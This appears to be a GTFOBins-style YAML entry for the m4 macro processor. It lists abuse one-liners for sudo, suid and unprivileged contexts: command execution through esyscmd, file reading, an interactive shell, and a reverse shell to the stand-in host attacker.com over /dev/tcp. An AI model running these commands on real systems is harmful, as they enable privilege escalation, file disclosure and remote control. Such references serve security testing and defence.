---
functions:
  command:
  - code: |-
      echo 'esyscmd(/path/to/command)' | m4
    contexts:
      sudo:
      unprivileged:
  file-read:
  - binary: false
    code: |-
      m4 /path/to/input-file
    contexts:
      sudo:
      suid:
      unprivileged:
  reverse-shell:
  - code: |-
      echo 'esyscmd(/bin/sh -i >& /dev/tcp/attacker.com/12345 0>&1)' | m4
    contexts:
      sudo:
      unprivileged:
    listener: tcp-server
  shell:
  - code: |-
      echo 'esyscmd(/bin/sh </dev/tty >/dev/tty 2>&1)' | m4
    contexts:
      sudo:
      unprivileged:
...
